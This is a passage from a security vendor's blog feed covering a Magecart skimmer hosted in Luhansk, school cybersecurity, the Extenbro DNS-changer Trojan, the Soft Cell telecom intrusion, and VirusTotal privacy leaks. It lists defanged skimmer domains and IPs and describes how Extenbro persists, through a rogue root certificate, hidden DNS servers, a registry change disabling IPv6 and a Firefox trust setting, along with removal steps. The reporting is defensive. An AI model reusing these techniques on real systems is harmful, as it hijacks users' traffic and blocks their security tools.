The corresponding hosting server (176.119.1[.]92) is located in Luhansk (also known as Lugansk), Ukraine.

A little bit of research on this city shows it is the capital of the unrecognized Luhansk People’s Republic (LPR), which declared its independence from Ukraine following the 2014 revolution ignited by the conflict between pro-European and pro-Russian supporters. It is part of a region also known as Donbass that has been the theater for an intense and ongoing war that has cost thousands of lives.

Amid this chaos, opportunists are offering up bulletproof hosting services for “grey projects” safe from the reach of European and American law enforcement. This is the case of bproof[.]host at 176.119.1[.]89, which advertises bulletproof IT services with VPS and dedicated servers in a private data center.

A host ripe with malware, skimmers, phishing domains

Choosing the ASN AS58271 “FOP Gubina Lubov Petrivna” located in Luhansk is no coincidence for the Magecart group behind this skimmer. In fact, on the same ASN at 176.119.1[.]70 is also another skimmer (xn--google-analytcs-xpb[.]com) using an internationalized domain name (IDN) that ties back to that same exfiltration gate.

In addition, that ASN is a hotspot for IDN-based phishing, in particular around cryptocurrency assets:

Bulletproof hosting services have long been a staple of cybercrime. For instance, the infamous Russian Business Network (RBN) ran a variety of malicious activities for a number of years.

Due to the very nature of such hosts, takedown operations are difficult. It’s not simply a case of a provider turning a blind eye on shady operations, but rather it is the core of their business model.

To protect our users against these threats, we are blocking all the domains and IP addresses we can find associated with skimmers and malware in general. We are also reporting the compromised Magento stores to their respective registrars/hosts.

Indicators of Compromise

Skimmers (hosts)
google-anaiytic[.]com (176.119.1[.]72)
xn--google-analytcs-xpb[.]com (176.119.1[.]70)

Skimmers (exfiltration gate/panel)
google.ssl.lnfo[.]cc (176.119.1[.]92)

Skimmers (JavaScript)

The post No man’s land: How a Magecart group is running a web skimming operation from a war zone appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Compromising vital infrastructure: problems in education security continue

Malwarebytes - Wed, 07/17/2019 - 14:17

The educational system and many of its elements are targets for cybercriminals on a regular basis. While education is a fundamental human right recognized by the United Nations, the financial means of many schools and other entities in the global educational system are often limited.

These limited budgets often result in weak or less-than-adequate protection against cyberthreats. Unfortunately, organizations in this industry are forced to economize and cut the costs of security.

Record keepers

Schools by nature have a lot of personal data on record—not only about their students, but in most cases, they also have records of the parents, legal guardians, and other caretakers of the children they educate. And the nature of the data—grades, health information, and social security numbers, for example—makes them extremely valuable for phishing and other social engineering attacks.

Ransomware can also have a devastating effect on educational institutions, as some of the information, like grades for example, may not be recorded anywhere else. If they are destroyed or held for ransom without the availability of backups, the results can be disastrous.

Special circumstances

Organizations in the education industry have some special circumstances to deal with when trying to protect their data and networks:

  • Many schools use special software that allows their students to log in both on premise and remotely so they can view their grades and homework assignments. These applications occasionally get hacked by students.
  • Growing networks enlarge the attack surface. Modern education requires children of young ages to learn computer skills, so many students are connected to the institution’s network at once.
  • If a tech-savvy student wants a day off, claims that he couldn’t access his homework assignments, or simply wants to brag, what’s to stop him from organizing or paying for a DDoS attack? Kids will be kids.
  • Schools often also harbor a mix of IoT and BYOD devices, which each come with their own potential problems. Some schools have noticed a spike in malware detections after holiday breaks, when infected devices get introduced back into the school environment.

The sensitive nature of the data and having an open platform for students at the same time creates a difficult situation for many educational institutions. After all, it is easy to kick in a door that is already half open— especially if there is a wealth of personally identifiable Information (PII) behind it.

The current situation

An analysis in December 2018 by SecurityScorecard ranked education as the worst in cybersecurity of 17 major industries. According to the study, the main areas of cybersecurity weaknesses in education are application security, endpoint security, patching cadence, and network security.

In our 2019 State of Malware report, we found education to be consistently in the top 10 industries targeted by cybercriminals. Looking only at Trojans and more sophisticated ransomware attacks, schools were even higher on the list, ranking as number one and number two, respectively.

So, it shouldn’t come as a surprise that according to a 2016 study entitled: The Rising Face of Cyber Crime: Ransomware, 13 percent of education organizations fall victim to ransomware attacks.

Malware strikes hard

Like many other organizations, educational institutions are under attack by the most active malware families, such as Emotet, TrickBot, and Ryuk, which wreaked havoc on organizations for the better part of the 2018–2019 school year.

Last May, the Coventry school district in Ohio had to send home its 2,000 students and close its doors for the duration of one day. The cause was probably a TrickBot infection, but the FBI is still busy with an ongoing investigation.

In February 2019, the Sylvan Union School District in California discovered a malware attack that made staff and teachers lose their connection to cloud-based data, networks, and educational platforms. Reportedly, they had to spend US$475,700 to clean up their networks.

On May 13, 2019, attackers infected the computer network of Oklahoma City Public Schools with ransomware, forcing the school district to shut down its network.

But it’s not just malware that educational institutions need to worry about. Scott County Schools in Kentucky paid US$3.7 million out to a phishing scam that posed as one of their vendors.

Unfortunately, that’s money many school districts, especially those in impoverished communities, cannot afford to pay out. So when can they do to get ahead of malware attacks before valuable data and funding fly out the bus window?

Recommended reading: What K–12 schools need to shore up cybersecurity Countermeasures

Given the complex situation and sensitive data most educational organizations have to deal with, there are a host of measures that should be taken to lower the risk of a costly incident. Recognizing that many schools must divert public funding to core curriculum, our recommendations represent a baseline level of protection districts should strive toward with limited resources.

  • Separate educational and organizational networks, with grades and curriculum in one place, and personal data in another. By using this infrastructure, it will be harder for cybercriminals to access personal data by using leaked or breached student and teacher accounts.
  • DDoS protection. DDoS attacks are so cheap ($10/hour) nowadays, that anyone with a grudge can have an unprotected server taken down for a few days without spending a fortune. The possible scope of DDoS attacks has been increased significantly, now that attackers have started using Memcached-enabled servers. To put a stop to outrageously-large DDoS attacks, those servers should not be Internet-facing.
  • Educate staff and students about the dangers they are facing and the possible consequences of not paying enough attention. Teachers can absorb cybersecurity education into reading comprehension lessons, and staff could benefit from awareness training during professional development days.
  • Lay out clear and concise regulations for the use of devices that belong to the organization and the way private devices are allowed to be used on the grounds.
  • Backups should be up-to-date and easy to deploy. Ransomware demands are high and even when you pay them, there is always the chance the decryption may fail—or never existed in the first place.
  • Investing in layered protection may seem costly, but compared to falling victim to malware or fraud, the investments is worth it.

In fact, all of these measures will cost money and we realize that will need to come out of a tight budget. But funding, or the lack thereof, can not be an excuse for weak security. Cybercrime is one of the biggest chunks of the modern economy. And guess who’s paying for most of that? Those who didn’t invest enough in security.

What a strange paradox that one of the best weapons against cybercrime is education, but that organizations in education have the biggest problems with security. We at Malwarebytes, with the help of educational leaders, aim to change that.

Stay safe, everyone!

The post Compromising vital infrastructure: problems in education security continue appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Hi, honey. It’s mom. My phone is acting funny again.

Malwarebytes - Tue, 07/16/2019 - 17:14

Whether it’s setting up access to a Netflix account on a smart TV or enabling personal email on an iPhone, some people—of all ages—have a hard time figuring out user-friendly technology. However, often times it’s older generations that have to turn to their progenitors for everything from uploading pictures to the cloud to deciding whether it’s safe to open an attachment.

Despite results from a 2018 study from the Pew Research Center, which found that there has been “significant growth in tech adoption in recent years among older generations—particularly Gen Xers and Baby Boomers,” Millennials and Gen Zs field many “how do I?” technology questions from their aging parents.

While older generations are embracing technology, such as smart phones and smart TVs, the constant need to update “can be difficult for seniors to keep up with,” according to Senior Living. “Often seniors need help from caregivers or cell phone technicians to understand new features to their devices.”

The frustration from older users over rapidly-evolving new technology, updates to software, and a laundry list of security best practices to keep track of—like needing 27 different passwords—can lead to tech and security fatigue, which causes users to bury their heads in the sand instead of having to keep up with it all. What’s easier, then, is calling up a younger friend or family member for help.

That’s all well and good, but do younger generations always know the right thing to do? And are they sick of serving as the family IT guy? How can disparate generations reconcile their relationship with technology and with each other while still staying safe?

My phone is acting weird

When seniors experience user challenges, they most often turn to the Internet or their families for tech support, according to 2019 Link-Age Connect Technology Study. Nicolas Poggi, who works for a software security firm in Santiago, Chile, agreed, explaining that his 54-year-old mother is constantly reaching out with questions about her phone.

“I think the main thing that keeps coming up is the fear that everything has a virus in it,” Poggi said. “I usually get a call or a sneaky message from Mom saying, ‘Hey, I think my phone has a virus or something. It’s acting odd, can you give me a hand?'”

Sometimes the problem is one of misconfigurations. “She’s misconfigured half of her settings by accident and the other half trying to fix the initial misconfigurations,” Poggi said, adding that his greatest technology concerns for his mother are privacy and security.

Yes, privacy and security are important concerns for most technology users, but Linkage Connect explained that when it comes to the elderly, “the biggest barriers that keep them from adopting new technology today are the complexity, understanding it all, the cost, and having no easy way to learn it.”

Scammers target older users

Verizon’s 2019 Data Breach Report found that 32 percent of data breaches involved phishing, where cybercriminals send emails pretending to be from reputable companies to coax people into revealing personal information, such as passwords and credit card numbers. Not surprisingly, young people are concerned that their aging parents could easily fall victim to a phish or some other type of fraudulent scam, especially because scammers are keen to target older users, whom they believe to be more vulnerable.

When asked about her perceived ability to detect fraud and scams, Poggi’s mom said, “I think there are obvious ones, like the email ones or those images that promise to make you a millionaire. Aside from that, I don’t really know what other types of scams are out there. It worries me that I don’t know what to look out for. I know how to keep my social media private, but I don’t really know who is looking at what or where.”

Poggi agrees with his mother’s assessment, but worries that the areas where she lacks awareness could lead to compromise.

“I don’t think their generation adopted technology in the way we have,” said Poggi. “They are way behind with best practices. Basic things like password hygiene, phishing, fake websites, fake offers, still get to them. Still, they seem to have adopted enough technology to make for an awfully dangerous combination: a lack of security plus online banking plus social media.”

I love my phone! I hate my phone!

Older generations are increasingly becoming major consumers of connected devices. In fact, 94 percent of Americans over the age of 50 use technology to stay connected with their friends and family members, according to the 2019 Tech and the 50+ Survey published by AARP.

Yet, many in the 50+ age group have a love-hate relationship with technology. The Linkage Connect survey covered a wide swath of participant ages—nearly half a century, actually. Some said they had no use for technology. Others said they couldn’t imagine life without it. Most respondents appreciated being able to use technology but found the learning curve frustrating.

“Finding time to learn to use and to fix technology is the biggest problem,” said one woman in the 75–79 age range.

A woman nearly 10 years her senior said, “I find it frustrating when setting up a new electronic device such as a printer, computer, phone, etc. Instructions are supposed to be simple, but there always seems to be something missed. Need a person to walk me through it.”

While others noted their reliance on family to help them navigate the complexities of their connected devices, one woman in her sixties said, “I find it interesting, but the advancements come so rapidly, it is hard to keep up. And the expense is ridiculous.”

Though technology admittedly makes some aspects of life simpler, another 75–79 year old woman said, “At times, I feel that if I have to learn one more thing I will scream, but it is keeping me current with the world.”

Convenience, affordability, and simplicity

According to AARP, technologies targeting, “the health, wellness, safety, and vitality of adults 50-plus are proliferating.” Technology innovators obviously crunched the numbers from the Census Bureau in preparation for January’s CES 2019 in Las Vegas, where many of the devices introduced for older generations ranged from awesome to odd.

As people age, however, they want to make things simpler. Simplicity and ease of use should be the goal of technologies and devices that are designed for older generations. The Linkage Connect study noted that, “With the 50+ population representing approximately 115 million in the United States alone today and the expectation for that number to reach 132 million by 2030 (from the US Census Bureau), it is now more important than ever to understand the older adult consumer.”

No one wants to fumble through learning how to use a connected device. If it’s too challenging, it’s useless. Asking for help can be embarrassing for older generations who have to turn to their children or grandchildren to learn how to use a new gadget, which is one reason why the American Society on Aging advised, “It is imperative that in addition to making technology more intuitive for older adults, training older adults in how to use technology must be a national priority.”

What’s important to remember is that education needs to be accessible and personal—at any age. In order to enable adoption that improves the lives of elders, manufacturers, and younger helpers, need to meet them where they are.

“They want to learn ‘hands on’ with others. Teaching older adults how to use these devices, in the manner in which they want to learn, could prove to benefit them as they age,” the Linkage Connect study said.

Older adults who feel overwhelmed should feel free to take the initiative to ask for help. And younger family members or friends should be patient and take a beat to not only fix the problem, but walk people through it. In the end, both generations can benefit from the extra security awareness practice.

The post Hi, honey. It’s mom. My phone is acting funny again. appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Meet Extenbro, a new DNS-changer Trojan protecting adware

Malwarebytes - Mon, 07/15/2019 - 14:54

Recently, we uncovered a new DNS-changer called Extenbro that comes with an adware bundler. These DNS-changers block access to security-related sites, so the adware victims can’t download and install security software to get rid of the pests.

From our viewpoint, this might be like sending in an elephant to save the mosquito, but the threat actors behind this attack have been known to use aggressive tactics in the past. What do they care if they open up your machine to all kinds of threats by disallowing you access to security sites and blocking any existing security software from getting updates? They just want to serve you adware.

Unfortunately, we have seen this kind of behavior before. But since this one uses a few fancy tricks, we’ll give you a quick overview of what it does and how you can get rid of it. For those just looking for a quick fix, there is a removal guide on our forums.

Infection vector

We have noticed the Extenbro Trojan is delivered on systems by a bundler that is detected by Malwarebytes as Trojan.IStartSurf.


First and foremost, the Trojan changes the DNS settings of the infected system so it won’t be able to reach any security vendors’ sites.

New for this one is that you have to access the Advanced DNS tab to find out that it has added four DNS servers rather than the usual two. Where people might be inclined to change the two that are visible, use the Advanced button and look at the DNS tab: It would cause them to leave the additional two behind.

Task Scheduler

Should you manage to correct the offending DNS servers and reboot the system before taking further measures, you will find that the DNS settings re-appear after a reboot. This is because of a randomly-named Scheduled Task that looks similar to this:

The location of the folder and the switches for the command seem to be fixed, but the folder name and file name are random.

Root certificate

The Trojan also adds a certificate to the set of Windows Root certificates.

Using the method outlined in the blog post Learning PowerShell: some basic commands, I established that the certificate has no “Friendly Name” and is supposedly registered to abose[at]reddit[dot]com.

Disables IPV6

By changing the registry value DisabledComponents under the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\TCPIP6\Parameters and setting the value to “FF”, the Trojan disables IPV6 to force the system to use the new DNS servers.


The malware also makes a change in the Firefox user.js file and sets the security.enterprise_roots.enabled setting to true, which Configures Firefox to use the Windows Certificate Store where the newly-added root certificate was added.

Removal instructions

Some of the changes that this malware makes could already be in place, if they are the user’s preferred settings. So feel free to skip the steps that you are not comfortable with.

What really needs to be done so you can download a removal tool or update you existing security software is to restore the DNS servers to what they were—or, if you don’t know the previous settings, to something safe. Most ISPs have the preferred DNS servers listed in their installation instructions or on their website. That is the first place to look. If you can’t find them there, you can use the DNS servers provided by OpenDNS. You can find instructions for many Operating Systems on their site.

An extra step needs to be taken when you are in this screen:

Make sure to click on Advanced…and select the DNS tab to find the extra two DNS servers that we mentioned earlier. Remove those before you change the two shown on the screen to your preferred ones.

Now, you should be able to visit security sites again. Follow the remaining instructions below:

  • To get to your security sites, you may need a restart of the browser. Do NOT reboot your system or the DNS servers might be changed for the worse again by the Scheduled Task that belongs to the Trojan. If your existing solution does not pick up on the malware, download  Malwarebytes to your desktop.
  • Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
  • Then click Finish.
  • Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
  • If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
  • When the scan is complete, make sure that All Threats are selected, and click Remove Selected.
  • Restart your computer when prompted to do so.
  • This procedure should take care of the Scheduled Task and the Root certificate.
  • If you want to undo the change that makes FireFox adhere to the Windows certificates, you can open Firefox and type about:config in the address bar. Then read and accept the “risk” and search for security.enterprise_roots.enabled. The default settings is false. You can change the setting by selecting the line and right clicking it to get a menu. Clicking Toggle changes the value back and forth between True and False. Close the about:config tab when you are done.

Should you need further help, feel free to reach out to us on the forums or by contacting our support department.


DNS servers:


SHA256 b2a28e9abb04a5926d53850623b1f3c6738169b27847e90c55119f2836c17006

Root certificate:


Stay safe, everyone!

The post Meet Extenbro, a new DNS-changer Trojan protecting adware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (July 8 – 14)

Malwarebytes - Mon, 07/15/2019 - 14:27

Last week on Malwarebytes Labs, we looked at ways to send your sensitive information in a secure fashion, examined some tactics in incident response land, and explored federal data privacy law. We also looked at how security tools can turn against you, and took a deep dive into the rather fiendish Soft Cell attack.

Other cybersecurity news
  • The UK government backs facial recognition tech: The controversial trials received the backing of the British government’s home secretary. (Source: BBC)
  • Who watches the Watchmen: British police officer misuses database. (Source: The Register)
  • Zoom zero-day lurches into view: Researchers report a bug which leaves Mac users susceptible to webcam hijacks. (Source: ThreatPost)
  • Listen closely: Google contractors can listen to Google Home audio clips. (Source: Sophos’s Naked Security Blog)
  • Agent Smith on the prowl: Android malware capable of replacing code with its own malicious wares found on more than 25 million devices. (Source: The Verge)
  • TrickBot is what’s hot: The timeless “classic” returns with a few new tricks up its sleeve, including some cunning spam antics. (Source: TechCrunch)
  • Pale Moon rising: Old versions of the popular browser found to be infected with malware. (Source: ZDNet)
  • Phish attacks are never far: A recent study revealed that one in 99 emails are classified as phishing. Here’s a good look at costs and some additional statistics. (Source: Small Business Trends)
  • Beware of whales: Ship operators are warned by the US coast guard to be on the lookout for targeted spear phishing attempts. (Source: Computing News)
  • Amazon is a Prime target: Beware of smart phishing scams looking to bait those looking for a bargain on Prime Day. (Source: Wired)

Stay safe, everyone!

The post A week in security (July 8 – 14) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cellular networks under fire from Soft Cell attacks

Malwarebytes - Fri, 07/12/2019 - 15:30

We place a lot of trust in our mobile experience, given they’re one of the most constant companions we have. Huge reams of data, tied to a device we always carry with us, with said device frequently offering additional built-in app functionality. An astonishing wealth of information, for anyone bold enough to try and take it.

Security firm Cybereason uncovered an astonishing attack dubbed “Operation soft cell” haunting at least ten cellular networks based around the globe. Over the course of seven years, they went after all manner of detailed information on just 20 to 30 targets, feeding it back to base and building up an amazingly detailed picture of their daily dealings.

What happened here?

The compromise, which the researchers have given a high probability of being a nation-state attack, went to elaborate lengths to nab their high value targets. Attackers first gained a foothold by targeting a web-connected server and making use of an exploit to gain access. A shell would then be placed to enable further unauthorised activity.

In this particular case, a modified version of the well-known China Chopper was deployed to carry out specific tasks. It’s quite flexible, able to run on multiple server platforms. It’s also quite old, dating back several years. I guess there’s no tunes quite like the classics.

Thanks to China Chopper and a variety of alternative compromise tools, the attackers would make use of credentials from the first machine to dig deeper in the network. Well-worn RATs like PoisonIvy were used to ensure continued access on compromised devices.

Eventually, they’d gain control of the Domain Controller and at that point,  it’s essentially game over for the targeted organisation.

Groundhog Day

It appears the criminals reused various techniques to work their way around the various cellular networks, with little resistance. Talk about “If it ain’t broke, don’t fix it.” So total was their ownership of certain organisations, they were able to set up VPN services to enable quick, persistent access on hijacked networks instead of taking the much slower route and connecting their way through multiple compromised servers.

If they were worried about being caught in the act, they certainly didn’t show it. In fact, from reading the main report it seems in cases where there was some pushback, they simply looped back around and tried again till they succeeded, attacking in waves staggered over a period of months.

The Crown Jewels

Most of the time, attacks on web-facing servers result in an email from Have I been pwned and you see which bits of personal information have been fired across the web this time. Not here, however—it was never going to end with a username/password dump.

The attackers plundered cellular networks, gained access to pretty much everything you could think of. In cases where the target was fully compromised, all username/passwords were grabbed, along with billing information and various smatterings of personal data.

However, the big prize here wasn’t being able to hurl all of this onto a Pastebin or upload it to social media as a free-for-all; nothing so bland. It was, instead, being able to sit on both this data quietly alongside hundreds of gigabytes of call detail records. This is, as you’ll see, a bad thing.

Call detail records: What are they?

Good question.

Call detail records are all about metadata. They won’t give you the contents of the call itself, but what they will give you is pretty much everything else. They’re useful for a variety of things: billing disputes, law enforcement inquiries, tracking people down, bill generation, call volumes/handling for businesses and much more. Not only do they avoid recordings of conversations, they also steer clear of specific location information.

Nonetheless, patterns of behaviour are easy to figure out. A typical CDR could include:

  • Caller
  • Recipient
  • Start/end time of call
  • Billing number
  • Voice/SMS/other
  • A specific number used to identify the record in question
  • How the call entered/exited the exchange

If you’re looking to target specific individuals, then this data over time is an incredible resource for an attacker to get hold of. Some may prefer the old spear phish/malware attachment type scenario, but by going after the target directly, it’s quite possible someone’s going to find out. Where targets are high value, they’ll almost certainly have additional security measures in place. For example, journalists who cover human rights abuses in dangerous parts of the world will often work with organisations who keep an eye out for potential attacks.

This method, aimed at slowly digging around behind the scenes and out of view from whoever happens to be using those networks, is much sneakier. Depending on how things pan out, it’s entirely possible they’d never even know they’d been compromised by proxy in the first place.

Hidden in plain sight

With methods such as this, the people behind the malware daisy chain have an amazing slice of access to the individual with no direct specific risk. Everything at that point comes down to how well the cellular network is locked down, how good their security is, how on the ball their incident response team happens to be, and so on.

If (say) they failed to spot numerous attacks, left vulnerable servers online, missed telltale signs that something is amiss, let well-known RATs like PoisonIvy dance across their network, allowed the hackers to set up a bunch of VPN nodes…well, you can see where I’m going with this.

Where I’m going is several years later and a large slice of “Oh dear.”


Well, first thing’s first: don’t panic. It’s worth noting there isn’t any additional verification (yet) outside the initial threat report. Something bad has clearly happened here, but as to how severe it is, we’ll leave that to others to debate.

Whether this was pulled off by a high-level nation state approved group of attackers or a random collection of bored people in an apartment, one way or another those cell networks really had a number done on them. The impact to the individuals caught by this is the same, and one assumes they’ve been informed and taken appropriate action. We can only hope the cellular networks impacted have now taken appropriate measures and shored up their defences.

The post Cellular networks under fire from Soft Cell attacks appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Caution: Misuse of security tools can turn against you

Malwarebytes - Thu, 07/11/2019 - 17:34

We have a saying in Greece: “They assigned the wolf to watch over the sheep.”

In a security context, this is a word of caution about making sure the tools we use to keep our information private don’t actually cause the data leaks themselves. In this article, I will be talking about some cases that I have come across in which security tools have leaked data they were intended to secure.

The VirusTotal problem

VirusTotal (VT) is a multi-scanner in which an individual researcher is free to upload any file they believe is suspicious. They can then view results from many antivirus (AV) products as to whether or not the file is considered malware. While this is an amazing service which I am certain everyone in the infosec world uses regularly, its usage needs to be carefully thought over.

What some people don’t realize is that every file you submit to VirusTotal gets saved on VT’s servers and is fully searchable. By using an internal VT tool called Malware RetroHunting, malware hunters have the ability to search for text and binary patterns in order to find malware similar to ones that he may be analyzing or tracking.

This is a great feature, but as you can imagine, just as someone could search for [insert malicious string of your choice], they could just as easily search for “Account Number:”, which might result in loads of documents containing such data. It is important to bring awareness to this fact so that people can properly use this tool without risking their private data.

I will go through a few cases showing the misuse of VirusTotal to serve as a warning for users who might be thinking about using either second rate/ unofficial tools or adopting practices built off of VT.

Case 1: The no AV argument

I far too often hear people saying something like this: “I don’t need an AntiVirus. I send files to VT for free when they look suspicious.”

I think it should be quite obvious why this method is flawed. If you submit all documents you receive to VT, then you run the risk of leaking private information, as stated above. Now, if you exclude scanning of documents from specific “trusted” addresses (in order to not leak confidential data), then you run the risk of getting a malware phished to you from a spoofed contact. Needless to say, this is not a safe way to keep yourself protected.

Case 2: API usage

The use of VirusTotal API can also be dangerous. Bugs in the code or logic can easily cause a mass upload of private files. This is a danger whether you are building your own tools or using tools like WINJA, which automate submission of files to VT. The only recommendation here is to make sure the tools you are using are reputable or you have done your own independent code audits to make sure no bugs may lead to data leakage.

When it comes to using other reputable security tools, it is wise to read over all of the documentation and make sure you understand how and when the given tool will incorporate VT.

Case 3: VT email scanning service

I have unfortunately seen may articles and forum posts online where people have been giving advice to use the VT attachment scan service. Basically, by sending an email attachment to, the sender can receive a response as to what VT found regarding the attachment.

Please do not take such advice unless you are sure the document you are scanning contains no private data. It is a risky game. If you are worried about malicious documents infecting your computer, then the logical conclusion would be to buy an antivirus with a good reputation and the technology to block malicious documents.

If you choose to send all your potentially private emails to VT, searchable by anyone, then you’re essentially undoing any potential security or privacy benefits by exposing all your data anyway. What damage is a spyware going to do when you’ve already sent your sensitive data out to a public database?

EXE files problem

The next case I want to talk about, while less sensitive, is a lot more likely to be overlooked.

In a corporate environment, we cannot rely on everyone to manually submit attachments or files to security engineers—all of this is automated. From my past experience and from speaking with fellow security engineers, I have seen that it is quite common for all executables entering a corporate network to automatically get scanned with various plugins tied to a given platform. I will highlight Carbon Black, an enterprise antivirus program, in this case, although many other security providers have this problem as well.

When a new exe makes its way into a network, Carbon Black stores it, but also has the ability to cross reference the given file with various plugins and tools that are built in or added to the platform. For example, you can click a bubble on any given file in your network, which will give you its results against wildfire sandbox. And of course, the topic that has received so much heat in the media this year—the VT plugin.

Now, while they have fixed the issues on submitting documents to avoid leaking data, they still do submit exes. But wait, so what? Isn’t that exactly what we want it to do?

Correct, it is. Automation is what every corporation aims for in its security infrastructure. There is nothing wrong with the root idea of submitting and scanning exes flowing through the network. However, automation sometimes comes with a tradeoff if not properly planned.

I have evaluated the security infrastructure of many corporate networks and in these evaluations, I have seen that in this attempt to scan all new exes for malware, the company’s in-house executables end up getting scanned as well.

So now, confidential exes are unknowingly being exposed and leaking arguably more sensitive data and intellectual property. In addition, think for a moment about how software developers typically code. While they are testing functionality, it is common for a developer to hard code some credentials, paths, or other revealing information for a test build. Sure, after they are done, for the production build, it will likely get changed to hide this information and make it dynamic, but in the meantime, these demo builds have been picked up by the EDR and scanned through various plugins.

Again, this is not a problem with the EDR itself, it is a problem with its implementation, entirely the responsibility of the customer using the software.

Remediation and prevention

Now this does not mean we need to abandon use of security tools for fear of data leaks; it simply means we need to make some adjustments. So what can a business do to protect against leaking their own data to the public?

There are many options which will depend upon the compliance requirements and needs of a given company, but I have a few base considerations I recommend.

Rules-based segmentation

Rather than having a blanket automation where everything is automatically scanned, I always recommend segmenting the actions taken when the EDR sees a new file based on user groups. For example, maybe users in the developers’ group do not have their binaries residing in a specific directory sent for auto scanning.

However, this is easier said than done because just simply enabling this type of rule can be catastrophic and may essentially allow a developer free rein to secretly develop malware. That’s why, when one security rule is relaxed for a given user, another rule must be increased to make up for it. So in this theoretical scenario, we have just given a developer a free pass to not have his executables scanned. So we have closed one door but opened another.

To make up for this, one thought might be to keep heavy watch on the IPs and ports that the dev machines are allowed to communicate over. If the developer needs to communicate with a specific IP for his software, he should get approval in advance from the security engineers. At this point, we can let the developer go ahead and create malware, but if his MAC address or IP is seen attempting communication with a non pre-approved IP or over a non pre-approved port, fire alerts. This type of rule is trivial to create using a good EDR platform.

The roles and expected behavior of a given employee’s machine must be fully understood beforehand to be able to keep proper control over a network.

Understand the tools you use

It is important to understand that security tools are made for generic use. The creators do not know specifically what your company does and what your privacy policies are. They do not know whether you will be developing your own software onsite or whether you are simply using the tool to scan downloaded files.

That being said, it is up to you, the user or security engineer in charge of evaluating, to make sure you understand all of the functionality and options a tool gives you.

A developer who creates a tool to scan email attachments automatically with VT is not necessarily acting maliciously. For some users, maybe a user who specifically does not create and store info in documents, this might be the best tool in the world, exactly what they need to automate their operations. For another company who sends their contracts in the form of Word documents, this might be catastrophic. At the end of the day, the responsibility cannot be blamed on the tool that behaved exactly as advertised. It’s up to the user to do her own research and understand what the tool does and how it will effect privacy and security.

The post Caution: Misuse of security tools can turn against you appeared first on Malwarebytes Labs.

Categories: Techie Feeds

What should a US federal data privacy law ideally include?

Malwarebytes - Wed, 07/10/2019 - 15:00

In the constant David-and-Goliath struggle between digital privacy advocates and corporate privacy invaders, the question of how to legally protect Americans with a comprehensive, federal data privacy law provides conflicting answers. Advocates want protections, which Big Tech interprets as restrictions.

As of today, there is no one digital privacy law to rule them all. While a few state laws exist that protect consumer privacy here in the US, overarching federal legislation, such as the Global Data Privacy Regulation (GDPR) in Europe, has not yet penetrated the market.

US-based corporations must comply with GDPR if they have a global presence, but that’s only for their European customers—and many have found convenient workarounds. Who will protect the American user? Smaller tech? Privacy-forward tech? What about we-don’t-have-a-lobbying-war-chest tech? How do they feel about a federal privacy law?

For months, Malwarebytes Labs has reported on data privacy laws in the United States and abroad. But the question of federal legislation that applies to the entire country has gone unanswered, as multiple Senate proposals have yet to move forward.

Further, despite Big Tech’s recently-avowed commitment to regulation, those same companies are reportedly funding efforts to dismantle newly-enacted stateside data privacy protections.

But earlier this year, a group of tech companies stood opposed. They wanted to strengthen one of those same privacy protections. This tech group included some of the most recognizable company names in user privacy: DuckDuckGo, Ghostery, ProtonMail, Lavabit, Brave, Vivaldi, Purism, and Disconnect.

We asked those companies to broaden their sights beyond state legislation. What did they want, if anything, from a federal data privacy law for the United States?

What’s the goal?

For many of these privacy-forward companies, a federal data privacy law would be far from restrictive. Instead, it is considered necessary.

Todd Weaver is the founder and chief executive of Purism. He supports a federal data privacy law, so long as it isn’t stripped of meaningful user protections and doesn’t create barriers to success for startups and mid-sized companies. Federal legislation could be, Weaver said, the one way to finally defend the public from an ongoing digital privacy crisis.

“We’re talking about the exploitation of people in the digital world, and this is a giant problem,” Weaver said. He continued:

“The problem can be boiled down to things that nobody should ever know. Those are where people are, what people do, and who talks to whom.”

In the US, those pieces of information are far from protected, though. Where we are, what we do, and who we talk to fuels a massive corporate surveillance machine driven by social media behemoths, aggressive online tracking, and unseen data brokers, all motivated by continuously-climbing advertising revenue. No current law forbids much of this.

So how do we fix it? Here are a few ideas from privacy advocates.

Like the CCPA…but better

Last year, California’s then-governor Jerry Brown signed the California Consumer Privacy Act (CCPA). Effective January 1, 2020, the CCPA grants Californians the rights to know what data is collected on them, whether that data is sold, the option to opt out of those sales, and the right to access that data.

In April, privacy search engine DuckDuckGo, joined by 23 other technology companies, sent a letter to the California Assembly’s Privacy Committee asking that the law be bolstered. The requested improvements, DuckDuckGo wrote, would include the right to opt out of having information shared—not just sold—and the right to sue companies that violated any privacy provision of the CCPA.

Helen Horstmann-Allen, chief operating officer at email provider Fastmail (which signed onto DuckDuckGo’s letter) said she would appreciate seeing legislation similar to CCPA go national.

“We were pleased to see California take the lead with their privacy laws to reflect how companies do business today. Expanding the scope of privacy legislation recognizes that companies don’t need to sell data to violate consumer privacy,” Horstmann-Allen said. “We’d love to see this type of legislation move on the national level as well. Privacy rights shouldn’t end at the state line.”

Jeremy Tillman, director of product at the ad-blocking browser extension Ghostery, made similar comments in a 2018 opinion piece for The Hill:

“If there is serious traction for federal consumer privacy legislation, which there absolutely should be, the California Consumer Protection law can serve as a solid template to model future laws after.”

A consumer’s right to sue for privacy violations

California’s privacy law received a major setback this year when a proposed amendment did not pass one of the state’s Senate committees. The amendment, SB 561, would have given Californians the right to sue a company that violated any privacy rights described in the CCPA.

Currently, CCPA only gives Californians the right to sue a company for the harm of a data breach. Though a novel inclusion when compared to the dearth of privacy protections across the nation, some argue that broader opportunities to go to court are needed.  

“If you can’t sue or do anything to go after these companies that are committing these atrocities, where does that leave us?” Weaver said. “We’ve already seen that with the CCPA in California.”

At least 40 bills have been introduced in California with the near-uniform purpose to amend the CCPA into a weaker version of itself. AB 846, for example, would have limited the CCPA’s discrimination prohibition. AB 873 would have pared down the definition of individuals’ personal information.

More attempts to weaken the CCPA remain, Weaver said.

“One of those bills is just about defanging the entire regulation,” Weaver said. “If you do that, if you defang, [the law] is just paper.”

Transparent data collection practices

Ghostery’s Tillman echoed the above sentiments that any federal data privacy legislation should “hold big tech accountable for their deceptive data collection practices,” but he added:

